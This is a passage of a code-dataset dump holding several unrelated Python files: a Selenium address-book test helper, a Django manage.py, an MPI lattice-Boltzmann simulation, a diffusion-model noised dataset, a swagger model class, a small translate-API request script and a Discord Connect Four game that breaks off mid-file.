dataStructuring(args.fp,args.dn)\nds.run()","repo_name":"ibalejandro/coffee_leaf_rust_diagnosis_dl","sub_path":"Model/dataSplitter.py","file_name":"dataSplitter.py","file_ext":"py","file_size_in_byte":8371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15047475009","text":"from selenium.webdriver.common.by import By\nfrom model.contact import Contact\nimport re\n\n\nclass ContactHelper:\n\n def __init__(self, app):\n self.app = app\n\n def return_home_page(self):\n wd = self.app.wd\n wd.find_element(By.LINK_TEXT, \"home page\").click()\n\n def add(self, contact):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.LINK_TEXT, \"add new\").click()\n self.fill_contact_form(contact)\n wd.find_element(By.XPATH, \"//div[@id='content']/form/input[21]\").click()\n self.return_home_page()\n self.cont_cache = None\n\n def delete_first_cont(self):\n self.delete_some_cont(0)\n\n def delete_some_cont(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_elements(By.NAME, \"selected[]\")[index].click()\n wd.find_element(By.XPATH, \"//input[@value='Delete']\").click()\n wd.switch_to.alert.accept()\n self.cont_cache = None\n\n def delete_some_cont_by_id(self, id):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.XPATH, \"//input[@value='Delete']\").click()\n wd.switch_to.alert.accept()\n self.cont_cache = None\n\n def add_some_cont_to_group(self, id):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.XPATH, \"//input[@value='Add to']\").click()\n self.cont_cache = None\n\n def select_group_for_del_cont(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_element(By.NAME, \"group\").click()\n wd.find_element(By.XPATH, f\"//option[@value={index}]\").click()\n\n def del_some_cont_from_group(self, id):\n wd = self.app.wd\n wd.find_element(By.CSS_SELECTOR, \"input[value='%s']\" % id).click()\n wd.find_element(By.NAME, \"remove\").click()\n wd.find_element(By.XPATH, \"//i/a\").click()\n #wd.find_element(By.LINK_TEXT, f'a[href=\"/?group={id}\"]').click()\n self.cont_cache = None\n\n def edit_first_cont(self, contact):\n self.edit_some_cont(0)\n\n def edit_some_cont(self, index, contact):\n wd = self.app.wd\n self.app.open_home_page()\n wd.find_elements(By.XPATH, \"//img[@alt='Edit']\")[index].click()\n self.fill_contact_form(contact)\n wd.find_element(By.NAME, \"update\").click()\n self.return_home_page()\n 
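The splitter above shuffles the lots and moves whole lots into the test set until roughly 25% of the scarcest file type is covered (`stop_criterion = ceil(min_count * 0.25)`). The same policy in miniature, with made-up per-lot counts of the scarcest type standing in for `validate_stop_criterion`:

```python
# Greedy lot-level split: whole lots go to test until the quota for the
# scarcest file type is met; everything else stays in train.
import math
import random


def split_lots(counts_by_lot: dict, test_fraction: float = 0.25):
    stop = math.ceil(sum(counts_by_lot.values()) * test_fraction)
    lots = list(counts_by_lot)
    random.shuffle(lots)
    test, train, acc = [], [], 0
    for lot in lots:
        if acc + counts_by_lot[lot] <= stop:
            test.append(lot)
            acc += counts_by_lot[lot]
        else:
            train.append(lot)
    return train, test
```

Splitting at lot granularity (rather than per file) is what keeps all images and annotations of one lot on the same side of the train/test boundary.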
self.cont_cache = None\n\n def edit_some_cont_by_id(self, id, contact):\n wd = self.app.wd\n self.app.open_home_page()\n #wd.find_element(By.CSS_SELECTOR, f\"a[href='edit.php?id={id}']\").click()\n wd.find_element(By.CSS_SELECTOR, \"a[href='edit.php?id=%s']\" % id).click()\n self.fill_contact_form(contact)\n wd.find_element(By.NAME, \"update\").click()\n self.return_home_page()\n self.cont_cache = None\n\n #def contact(self, contact):\n # wd = self.app.wd\n # wd.find_element(By.NAME, \"firstname\").click()\n # wd.find_element(By.NAME, \"firstname\").clear()\n # wd.find_element(By.NAME, \"firstname\").send_keys(contact.firstname)\n # wd.find_element(By.NAME, \"middlename\").clear()\n # wd.find_element(By.NAME, \"middlename\").send_keys(contact.middlename)\n # wd.find_element(By.NAME, \"lastname\").clear()\n # wd.find_element(By.NAME, \"lastname\").send_keys(contact.lastname)\n # wd.find_element(By.NAME, \"mobile\").click()\n # wd.find_element(By.NAME, \"mobile\").clear()\n # wd.find_element(By.NAME, \"mobile\").send_keys(contact.telephone)\n\n def fill_contact_form(self, contact):\n wd = self.app.wd\n self.change_contact_field(\"firstname\", contact.firstname)\n self.change_contact_field(\"middlename\", contact.middlename)\n self.change_contact_field(\"lastname\", contact.lastname)\n #self.change_contact_field(\"home\", contact.homephone)\n #self.change_contact_field(\"mobile\", contact.telephone)\n\n def change_contact_field(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element(By.NAME, field_name).click()\n wd.find_element(By.NAME, field_name).clear()\n wd.find_element(By.NAME, field_name).send_keys(text)\n\n def count_cont(self):\n wd = self.app.wd\n self.app.open_home_page()\n return len(wd.find_elements(By.XPATH, \"//img[@alt='Edit']\"))\n\n cont_cache = None\n\n def get_contact_list(self):\n if self.cont_cache is None:\n wd = self.app.wd\n self.app.open_home_page()\n self.cont_cache = []\n for element in wd.find_elements(By.NAME, \"entry\"):\n cells = element.find_elements(By.TAG_NAME, \"td\")\n id = cells[0].find_element(By.NAME, \"selected[]\").get_attribute(\"value\")\n firstname = cells[2].text\n lastname = cells[1].text\n all_phones = cells[5].text\n adress = cells[3].text\n all_mails = cells[4].text\n self.cont_cache.append(Contact(firstname=firstname, lastname=lastname, id=id, adress=adress,\n all_phones_from_home_page=all_phones, all_mails=all_mails))\n return list(self.cont_cache)\n\n def open_contact_to_edit(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n row = wd.find_elements(By.NAME, \"entry\")[index]\n cell = row.find_elements(By.TAG_NAME, \"td\")[7]\n cell.find_element(By.TAG_NAME, \"a\").click()\n\n def open_contact_view(self, index):\n wd = self.app.wd\n self.app.open_home_page()\n row = wd.find_elements(By.NAME, \"entry\")[index]\n cell = row.find_elements(By.TAG_NAME, \"td\")[6]\n cell.find_element(By.TAG_NAME, \"a\").click()\n\n def get_contact_info_from_edit_page(self, index):\n wd = self.app.wd\n self.open_contact_to_edit(index)\n firstname = wd.find_element(By.NAME, \"firstname\").get_attribute(\"value\")\n lastname = wd.find_element(By.NAME, \"lastname\").get_attribute(\"value\")\n adress = wd.find_element(By.NAME, \"address\").get_attribute(\"value\")\n email = wd.find_element(By.NAME, \"email\").get_attribute(\"value\")\n email2 = wd.find_element(By.NAME, \"email2\").get_attribute(\"value\")\n email3 = wd.find_element(By.NAME, \"email3\").get_attribute(\"value\")\n id = wd.find_element(By.NAME, 
\"id\").get_attribute(\"value\")\n homephone = wd.find_element(By.NAME, \"home\").get_attribute(\"value\")\n workphone = wd.find_element(By.NAME, \"work\").get_attribute(\"value\")\n mobilephone = wd.find_element(By.NAME, \"mobile\").get_attribute(\"value\")\n secondaryphone = wd.find_element(By.NAME, \"phone2\").get_attribute(\"value\")\n return Contact(firstname=firstname, lastname=lastname, id=id, adress=adress, homephone=homephone,\n workphone=workphone, mobilephone=mobilephone, secondaryphone=secondaryphone,\n email=email, email2=email2, email3=email3)\n\n def get_contact_from_view_page(self, index):\n wd = self.app.wd\n self.open_contact_view(index)\n text = wd.find_element(By.ID, \"content\").text\n homephone = re.search(\"H: (.*)\", text).group(1)\n workphone = re.search(\"W: (.*)\", text).group(1)\n mobilephone = re.search(\"M: (.*)\", text).group(1)\n secondaryphone = re.search(\"P: (.*)\", text).group(1)\n return Contact(homephone=homephone, workphone=workphone,\n mobilephone=mobilephone, secondaryphone=secondaryphone)","repo_name":"kabanovic/python_training","sub_path":"fixture/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40131431806","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nPROJECT_DIR = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(PROJECT_DIR)\nsys.path.append(os.path.abspath(PROJECT_DIR + '/../'))\nsys.path.append(os.path.abspath(PROJECT_DIR + '/../realestate/'))\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"testproject.settings\")\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n\n","repo_name":"wm3ndez/realestate","sub_path":"testproject/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"91"} +{"seq_id":"6282225765","text":"\"\"\"\nStreaming and collision step\n============================\nThe streaming step is the first step of the Lattice Boltzmann Method (LBM).\nThe streaming step is a simple shift of the pdf in the direction of the\nvelocity. The collision step is the second step of the LBM. The collision step\nis a relaxation of the pdf towards the equilibrium pdf. The equilibrium pdf is\nthe pdf that would be obtained if the fluid particles were in equilibrium. The\nequilibrium pdf is calculated using the density and the velocity of the fluid\nparticles. 
\n============================\n\nto run the script: \nmpirun -np 4 python scripts/milestone2_parallel.py\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpi4py import MPI\nfrom array2gif import write_gif\n\nfrom hpc_fluid_dynamics.lbm_utils import *\n\n\ncomm = MPI.COMM_WORLD # start the communicator assign to comm\nsize = comm.Get_size() # get the size and assign to size\nrank = comm.Get_rank()\n\n\nnt = 1000 # timesteps to iterate\ndt = 0.0001 # timestep length\n\nomega = 1\nprint('Rank/Size {}/{}'.format(rank,size))\n\nNX = 256\nNY = 256\n\n### Domain decomposition\nif NX < NY:\n sectsX=int(np.floor(np.sqrt(size*NX/NY)))\n sectsY=int(np.floor(size/sectsX))\n print('We have {} fields in x-direction and {} in y-direction'.format(sectsX,sectsY))\n print('How do the fractions look like?')\n print('NX/NY={} and sectsX/sectsY = {}\\n'.format(NX/NY,sectsX/sectsY))\nelif NX > NY:\n sectsY=int(np.floor(np.sqrt(size*NY/NX)))\n sectsX=int(np.floor(size/sectsY))\n print('We have {} fields in x-direction and {} in y-direction'.format(sectsX,sectsY))\n print('How do the fractions look like?')\n print('NX/NY={} and sectsX/sectsY = {}\\n'.format(NX/NY,sectsX/sectsY))\nelif NX==NY:\n sectsY=int(np.floor(np.sqrt(size)))\n sectsX=int(size/sectsY)\n if rank == 0: print('In the case of equal size we divide the processes as {} and {}'.format(sectsX,sectsY))\n\nsectsX=int(np.floor(np.sqrt(size)))\nsectsY=int(size//sectsX)\n\nnxsub = NX//sectsX+2\nnysub = NY//sectsY+2\nboundary_k=[False,False,False,False]\ncartcomm=comm.Create_cart(dims=[sectsX,sectsY],periods=[True,True],reorder=False)\nrcoords = cartcomm.Get_coords(rank)\n\n# where to receive from and where send to \nsR,dR = cartcomm.Shift(1,1)\nsL,dL = cartcomm.Shift(1,-1)\n\nsU,dU = cartcomm.Shift(0,-1)\nsD,dD = cartcomm.Shift(0,1)\n\nsd = np.array([sR,dR,sL,dL,sU,dU,sD,dD], dtype = int)\n\nallrcoords = comm.gather(rcoords,root = 0)\nallDestSourBuf = np.zeros(size*8, dtype = int)\ncomm.Gather(sd, allDestSourBuf, root = 0)\n\nif rank == 0: \n density_plot_list = []\n print(allrcoords)\n print(' ')\n cartarray = np.ones((sectsY,sectsX),dtype=int)\n allDestSour = np.array(allDestSourBuf).reshape((size,8))\n for i in np.arange(size):\n cartarray[allrcoords[i][0],allrcoords[i][1]] = i\n print('Rank {} all destinations and sources {}'.format(i,allDestSour[i,:]))\n sR,dR,sL,dL,sU,dU,sD,dD = allDestSour[i]\n print('Rank {} is at {}'.format(i,allrcoords[i]))\n print('sour/dest right {} {}'.format(sR,dR))\n print('sour/dest left {} {}'.format(sL,dL)) \n print('sour/dest up {} {}'.format(sU,dU))\n print('sour/dest down {} {}'.format(sD,dD))\n #print('[stdout:',i,']',allDestSour[i])\n print('')\n print(cartarray)\n\ndef Communicate(pdf_9xy,cartcomm,sd):\n recvbuf = np.zeros(pdf_9xy[:,:,1].shape)\n sR,dR,sL,dL,sU,dU,sD,dD = sd\n # Send to right which is destination rigth (dR) and receive from left which is source right (sR)\n # print(rank,'Right, source',sR,'destination',dR)\n sendbuf = pdf_9xy[:,:,-2].copy() # Send the second last column to dR\n cartcomm.Sendrecv(sendbuf, dR, recvbuf = recvbuf, source = sR)\n pdf_9xy[:,:,0] = recvbuf # received into the 0th column from sR\n # Send to left and receive from right\n #print(rank,'Left, source',sL,'destination',dL)\n sendbuf = pdf_9xy[:,:,1].copy()\n cartcomm.Sendrecv(sendbuf, dL, recvbuf = recvbuf, source = sL)\n pdf_9xy[:,:,-1] = recvbuf\n # Send to up and receive from down\n #print(rank,'Up, source',sU,'destination',dU)\n sendbuf = pdf_9xy[:,1,:].copy()\n cartcomm.Sendrecv(sendbuf, dU, recvbuf = 
recvbuf, source = sU)\n pdf_9xy[:,-1,:] = recvbuf\n # Send to down and receive from up\n #print(rank,'Down, source',sD,'destination',dD)\n sendbuf = pdf_9xy[:,-2,:].copy()\n cartcomm.Sendrecv(sendbuf, dD, recvbuf = recvbuf, source = sD)\n pdf_9xy[:,0,:]=recvbuf\n#\n return pdf_9xy\n\n## INITIALIZE THE GRID\n\npdf_9xy_full_range = init_pdf(NX,NY,mode = \"square\")\npdf_9xy = pdf_9xy_full_range[:,rcoords[0]*NY//sectsY:(rcoords[0]+1)*NY//sectsY,rcoords[1]*NX//sectsX:(rcoords[1]+1)*NX//sectsX]\n\nfor t in np.arange(nt):\n # First we need a communication step\n pdf_9xy = Communicate(pdf_9xy,cartcomm,sd)\n # Then we do a timestep forward\n # MOMENT UPDATE \n density = calc_density(pdf_9xy)\n local_avg_velocity = calc_local_avg_velocity(pdf_9xy)\n\n # EQUILIBRIUM \n equilibrium_pdf_9xy = calc_equilibrium_pdf(density, local_avg_velocity)\n\n # COLLISION STEP\n pdf_9xy = pdf_9xy + omega*(equilibrium_pdf_9xy - pdf_9xy)\n\n # STREAMING STEP\n pdf_9xy = streaming(pdf_9xy)\n density_full_range = np.zeros((NX*NY))\n\n #comm.Gather(density[1:-1,1:-1].reshape((nxsub-2)*(nysub-2)), density_full_range, root = 0)\n comm.Gather(density.reshape((nxsub-2)*(nysub-2)), density_full_range, root = 0)\n rcoords_x = comm.gather(rcoords[1], root=0)\n rcoords_y = comm.gather(rcoords[0], root=0)\n if rank == 0:\n\n X0, Y0 = np.meshgrid(np.arange(NX),np.arange(NY))\n xy = np.array([rcoords_x,rcoords_y]).T\n density_plot = np.zeros((NX,NY))\n #\n for i in np.arange(sectsX):\n for j in np.arange(sectsY):\n k = i*sectsX+j\n xlo = NX//sectsX*xy[k,1]\n xhi = NX//sectsX*(xy[k,1]+1)\n ylo = NY//sectsY*xy[k,0]\n yhi = NY//sectsY*(xy[k,0]+1)\n clo = k*NX*NY//(sectsX*sectsY)\n chi = (k+1)*NX*NY//(sectsX*sectsY)\n\n density_plot[xlo:xhi,ylo:yhi] = density_full_range[clo:chi].reshape(NX//sectsX,NY//sectsY)\n #print the middle of the grid\n print(density_plot[NX//2,NY//2])\n density_plot_list.append(density_plot)\n\nif rank == 0:\n \n c_plot_list = np.array(density_plot_list)\n print(c_plot_list.shape)\n c_plot_list = c_plot_list[..., np.newaxis] * np.ones(3)\n c_plot_list = c_plot_list / np.max(c_plot_list) * 255\n write_gif(c_plot_list, 'results/ml2_parallel_cluster.gif', fps=30)\n\n","repo_name":"tidiane-camaret/hpc_fluid_dynamics","sub_path":"scripts/parallel/milestone2_parallel.py","file_name":"milestone2_parallel.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4714337668","text":"import logging\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom rdkit import Chem\nfrom torch.utils.data import Dataset\n\nfrom ..utils import utils, variance_schedules\nfrom . import macrocycle\n\n\nclass NoisedDataset(Dataset):\n \"\"\"Class that produces noised outputs given a wrapped dataset. 
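`Communicate` in the LBM script above is a standard ghost-cell (halo) exchange on a periodic Cartesian communicator. The same pattern reduced to one axis, using only calls that appear in the script (`Create_cart`, `Shift`, `Sendrecv`); a sketch meant to run under `mpirun -np N` with mpi4py installed:

```python
# Every rank ships its last interior column right and receives its left
# ghost column from the neighbour, via the (source, dest) pair from Shift().
import numpy as np
from mpi4py import MPI

comm = MPI.COMM_WORLD
cart = comm.Create_cart(dims=[comm.Get_size()], periods=[True], reorder=False)
src, dst = cart.Shift(0, 1)

field = np.full((4, 6), float(cart.Get_rank()))  # 4 rows, 6 cols incl. ghost cols
recv = np.empty(field[:, 0].shape)
cart.Sendrecv(field[:, -2].copy(), dst, recvbuf=recv, source=src)
field[:, 0] = recv  # left ghost column now holds the neighbour's data
```

`Sendrecv` pairs the send and receive in one call, which avoids the deadlock a naive blocking `Send` followed by `Recv` can produce when every rank sends first.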
Wrapped dset should return a\n tensor from __getitem__ if dset_key is not specified; otherwise, returns a dictionary where the\n item to noise is under dset_key.\n\n modulo can be given as either a float or a list of floats\n \"\"\"\n\n def __init__(\n self,\n dset: macrocycle.MacrocycleInternalCoordinateDataset,\n dset_key: str = \"angles\",\n timesteps: int = 50,\n exhaustive_t: bool = False,\n beta_schedule: variance_schedules.SCHEDULES = \"cosine\",\n nonangular_variance: float = 1.0,\n angular_variance: float = 1.0,\n ) -> None:\n super().__init__()\n\n self.dset = dset\n assert hasattr(dset, \"feature_names\")\n assert hasattr(dset, \"feature_is_angular\")\n self.dset_key = dset_key\n self.n_features = len(dset.feature_is_angular)\n\n self.nonangular_var_scale = nonangular_variance\n self.angular_var_scale = angular_variance\n\n self.timesteps = timesteps\n self.schedule = beta_schedule\n self.exhaustive_timesteps = exhaustive_t\n if self.exhaustive_timesteps:\n logging.info(f\"Exhuastive timesteps for {dset}\")\n\n betas = variance_schedules.get_variance_schedule(beta_schedule, timesteps)\n self.alpha_beta_terms = variance_schedules.compute_alphas(betas)\n\n @property\n def structures(self) -> Optional[Dict[str, Dict[str, pd.DataFrame]]]:\n return self.dset.structures\n\n @property\n def atom_features(self) -> Optional[Dict[str, Dict[str, Union[Chem.Mol, pd.DataFrame]]]]:\n return self.dset.atom_features\n\n @property\n def feature_names(self) -> Tuple[str, ...]:\n \"\"\"Pass through feature names property of wrapped dset.\"\"\"\n return self.dset.feature_names\n\n @property\n def feature_is_angular(self) -> Tuple[bool, ...]:\n \"\"\"Pass through feature is angular property of wrapped dset.\"\"\"\n return self.dset.feature_is_angular\n\n @property\n def pad(self) -> int:\n \"\"\"Pass through the pad property of wrapped dset.\"\"\"\n return self.dset.pad\n\n @property\n def means(self) -> Optional[np.ndarray]:\n return self.dset.means\n\n @property\n def means_dict(self) -> Optional[Dict[str, float]]:\n return self.dset.means_dict\n\n @means.setter\n def means(self, means: Dict[str, float]) -> None:\n self.dset.means = means\n\n @property\n def all_lengths(self) -> List[int]:\n return self.dset.all_lengths\n\n def sample_length(self, *args, **kwargs) -> Union[int, List[int]]:\n return self.dset.sample_length(*args, **kwargs)\n\n def get_atom_features(\n self, *args, **kwargs\n ) -> Union[torch.Tensor, Tuple[torch.Tensor, List[int]]]:\n return self.dset.get_atom_features(*args, **kwargs)\n\n def get_structure_as_dataframe(self, index: int) -> pd.DataFrame:\n return self.dset.get_structure_as_dataframe(index)\n\n def __str__(self) -> str:\n return f\"NoisedAnglesDataset wrapping {self.dset} with {len(self)} examples with {self.schedule}-{self.timesteps} with variance scales {self.nonangular_var_scale} and {self.angular_var_scale}\"\n\n def __len__(self) -> int:\n if not self.exhaustive_timesteps:\n return len(self.dset)\n else:\n return int(len(self.dset) * self.timesteps)\n\n def sample_noise(self, vals: torch.Tensor) -> torch.Tensor:\n \"\"\"Adaptively sample noise based on modulo.\n\n We scale only the variance because we want the noise to remain zero centered\n \"\"\"\n # Noise is always 0 centered\n noise = torch.randn_like(vals)\n\n # Shapes of vals couled be (batch, seq, feat) or (seq, feat)\n # Therefore we need to index into last dimension consistently\n\n # Scale by provided variance scales based on angular or not\n if self.angular_var_scale != 1.0 or 
self.nonangular_var_scale != 1.0:\n for j in range(noise.shape[-1]): # Last dim = feature dim\n s = (\n self.angular_var_scale\n if self.feature_is_angular[j]\n else self.nonangular_var_scale\n )\n noise[..., j] *= s\n\n # Make sure that the noise doesn't run over the boundaries\n noise[..., self.feature_is_angular] = utils.modulo_with_wrapped_range(\n noise[..., self.feature_is_angular], -np.pi, np.pi\n )\n\n return noise\n\n def __getitem__(\n self,\n index: int,\n use_t_val: Optional[int] = None,\n ignore_zero_center: bool = False,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"Gets the i-th item in the dataset and adds noise use_t_val is useful for manually\n querying specific timepoints.\"\"\"\n assert 0 <= index < len(self), f\"Index {index} out of bounds for {len(self)}\"\n # Handle cases where we exhaustively loop over t\n if self.exhaustive_timesteps:\n item_index = index // self.timesteps\n assert item_index < len(self)\n time_index = index % self.timesteps\n logging.debug(f\"Exhaustive {index} -> item {item_index} at time {time_index}\")\n assert (\n item_index * self.timesteps + time_index == index\n ), f\"Unexpected indices for {index} -- {item_index} {time_index}\"\n item = self.dset.__getitem__(item_index, ignore_zero_center=ignore_zero_center)\n else:\n item = self.dset.__getitem__(index, ignore_zero_center=ignore_zero_center)\n\n # If wrapped dset returns a dictionary then we extract the item to noise\n if self.dset_key is not None:\n assert isinstance(item, dict)\n vals = item[self.dset_key].clone()\n else:\n vals = item.clone()\n assert isinstance(\n vals, torch.Tensor\n ), f\"Using dset_key {self.dset_key} - expected tensor but got {type(vals)}\"\n\n # Sample a random timepoint and add corresponding noise\n if use_t_val is not None:\n assert not self.exhaustive_timesteps, \"Cannot use specific t in exhaustive mode\"\n t_val = np.clip(np.array([use_t_val]), 0, self.timesteps - 1)\n t = torch.from_numpy(t_val).long()\n elif self.exhaustive_timesteps:\n t = torch.tensor([time_index]).long() # list to get correct shape\n else:\n t = torch.randint(0, self.timesteps, (1,)).long()\n\n # Get the values for alpha and beta\n sqrt_alphas_cumprod_t = self.alpha_beta_terms[\"sqrt_alphas_cumprod\"][t.item()]\n sqrt_one_minus_alphas_cumprod_t = self.alpha_beta_terms[\"sqrt_one_minus_alphas_cumprod\"][\n t.item()\n ]\n # Noise is sampled within range of [-pi, pi], and optionally\n # shifted to [0, 2pi] by adding pi\n noise = self.sample_noise(vals) # Vals passed in only for shape\n\n # Add noise and ensure noised vals are still in range\n noised_vals = sqrt_alphas_cumprod_t * vals + sqrt_one_minus_alphas_cumprod_t * noise\n assert noised_vals.shape == vals.shape, f\"Unexpected shape {noised_vals.shape}\"\n # The underlying vals are already shifted, and noise is already shifted\n # All we need to do is ensure we stay on the corresponding manifold\n # Wrap around the correct range\n noised_vals[:, self.feature_is_angular] = utils.modulo_with_wrapped_range(\n noised_vals[:, self.feature_is_angular], -np.pi, np.pi\n )\n\n retval = {\n \"corrupted\": noised_vals,\n \"t\": t,\n \"known_noise\": noise,\n \"sqrt_alphas_cumprod_t\": sqrt_alphas_cumprod_t,\n \"sqrt_one_minus_alphas_cumprod_t\": sqrt_one_minus_alphas_cumprod_t,\n }\n\n # Update dictionary if wrapped dset returns dicts, else just return\n if isinstance(item, dict):\n assert item.keys().isdisjoint(retval.keys())\n item.update(retval)\n return item\n return 
retval\n","repo_name":"Genentech/ringer","sub_path":"ringer/data/noised.py","file_name":"noised.py","file_ext":"py","file_size_in_byte":8314,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"10464231498","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.user import User\nfrom swagger_server.models.time_interval import TimeInterval\nfrom swagger_server import util\n\n\nclass ResourceQuery(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, user_info: User=None, time_info: TimeInterval=None): # noqa: E501\n \"\"\"ResourceQuery - a model defined in Swagger\n\n :param user_info: The user_info of this ResourceQuery. # noqa: E501\n :type user_info: User\n :param time_info: The time_info of this ResourceQuery. # noqa: E501\n :type time_info: TimeInterval\n \"\"\"\n self.swagger_types = {\n 'user_info': User,\n 'time_info': TimeInterval\n }\n\n self.attribute_map = {\n 'user_info': 'userInfo',\n 'time_info': 'timeInfo'\n }\n\n self._user_info = user_info\n self._time_info = time_info\n\n @classmethod\n def from_dict(cls, dikt) -> 'ResourceQuery':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The ResourceQuery of this ResourceQuery. # noqa: E501\n :rtype: ResourceQuery\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def user_info(self) -> User:\n \"\"\"Gets the user_info of this ResourceQuery.\n\n\n :return: The user_info of this ResourceQuery.\n :rtype: User\n \"\"\"\n return self._user_info\n\n @user_info.setter\n def user_info(self, user_info: User):\n \"\"\"Sets the user_info of this ResourceQuery.\n\n\n :param user_info: The user_info of this ResourceQuery.\n :type user_info: User\n \"\"\"\n\n self._user_info = user_info\n\n @property\n def time_info(self) -> TimeInterval:\n \"\"\"Gets the time_info of this ResourceQuery.\n\n\n :return: The time_info of this ResourceQuery.\n :rtype: TimeInterval\n \"\"\"\n return self._time_info\n\n @time_info.setter\n def time_info(self, time_info: TimeInterval):\n \"\"\"Sets the time_info of this ResourceQuery.\n\n\n :param time_info: The time_info of this ResourceQuery.\n :type time_info: TimeInterval\n \"\"\"\n\n self._time_info = time_info\n","repo_name":"5GZORRO/datalake","sub_path":"services/catalog/python-flask-server/swagger_server/models/resource_query.py","file_name":"resource_query.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"24051981010","text":"import urllib.request\nimport urllib.parse\nimport ssl\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36'\n}\n\nurl = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule&smartresult=ugc&sessionFrom=null'\n\nformdata = {\n 'i': '男人',\n 'from': 'AUTO',\n 'to': 'AUTO',\n 'smartresult': 'dict',\n 'client': 'fanyideskweb',\n 'doctype': 'json',\n 'version': '2.1',\n 'keyfrom': 'fanyi.web',\n 'action': 'FY_BY_CLICKBUTTION',\n 'typoResult': 'false',\n}\n# 取消验证\ncontext = ssl._create_unverified_context()\n\n# 编码并转成Unicode\nformdata = 
urllib.parse.urlencode(formdata).encode('utf8')\n\n# Create the request\nrequest = urllib.request.Request(url=url, data=formdata, headers=headers)\n\n# Send the request\nresponse = urllib.request.urlopen(request, context=context)\n\nprint(response.read())\n","repo_name":"doublepixel/paChong","sub_path":"代码/02day/urllib的post请求.py","file_name":"urllib的post请求.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12171875859","text":"import discord\nfrom ext import commands\nimport asyncio \n\nred = '\\N{LARGE RED CIRCLE}'\nblue = '\\N{LARGE BLUE CIRCLE}'\nblank = '\\N{MEDIUM BLACK CIRCLE}'\n\n\nclass ConnectFour:\n\n\n    def __init__(self, bot):\n        self.bot = bot\n    \n    @staticmethod\n    def grid_maker():\n        rows = 7\n        cols = 7\n        grid = []\n        for i in range(rows):\n            line = []\n            for value in range(cols):\n                line.append(blank)\n            grid.append(line)\n        return grid\n\n\n    async def get_move(self, base, player):\n\n        def move_check(message):\n            if message.author == player:\n                return True\n\n\n        msg = await self.bot.wait_for_message(timeout=60, \n                                              channel=base.channel, \n                                              check=move_check)\n        while msg:\n            if msg.content.isdigit():\n                print('yes')\n                if int(msg.content) >= 1 and int(msg.content) <= 7:\n                    ret = int(msg.content) - 1\n                    await asyncio.sleep(0.2)\n                    await self.bot.delete_message(msg)\n                    return ret\n                else:\n                    to_del = await self.bot.send_message(base.channel, 'Enter a valid number {}'.format(player.mention))\n                    await asyncio.sleep(0.2)\n                    await self.bot.delete_messages([msg, to_del])\n            else:\n                if msg.content.strip().lower() == 'give up':\n                    return None\n                to_del = await self.bot.send_message(base.channel, 'You have to enter an integer {}'.format(player.mention))\n                await asyncio.sleep(0.1)\n                await self.bot.delete_messages([msg, to_del])\n\n            msg = await self.bot.wait_for_message(timeout=60, \n                                                  channel=base.channel, \n                                                  check=move_check)\n        print('NO')\n        return None\n\n\n    async def player_input(self, base, grid, colour, player):\n        to_del = await self.bot.send_message(base.channel, 'Enter a move {}'.format(player.mention))\n        move = await self.get_move(base, player)\n        await self.bot.delete_message(to_del)\n        while move is not None:\n            for i in range(len(grid)):\n                if grid[i][move] == blank:\n                    grid[i][move] = colour\n                    pos = [i,int(move)]\n                    return [grid, pos]\n            to_del = await self.bot.send_message(base.channel,\"Column Full! Try another Column\")\n            move = await self.get_move(base, player)\n            await self.bot.delete_message(to_del)\n        return False\n\n\n    async def display_grid(self, base, grid):\n        fmt = ''\n        for i in reversed(grid):\n            fmt += ''.join(i)+' \\n'\n        numbers = ':one::two::three::four::five::six::seven:'\n        fmt += numbers\n        await self.bot.edit_message(base, fmt)\n\n\n\n    async def start_game(self, ctx, base, p1, p2):\n        grid = self.grid_maker()\n        cycles = int(len(grid)*len(grid[0])/2)\n        for i in range(cycles):\n            # Player 1\n\n            await self.display_grid(base, grid)\n            move = await self.player_input(base, grid, red, p1)\n            if not move:\n                await self.bot.say('**{}** wins the game! **{}** gave up!'.format(p2.name, p1.name))\n                break\n            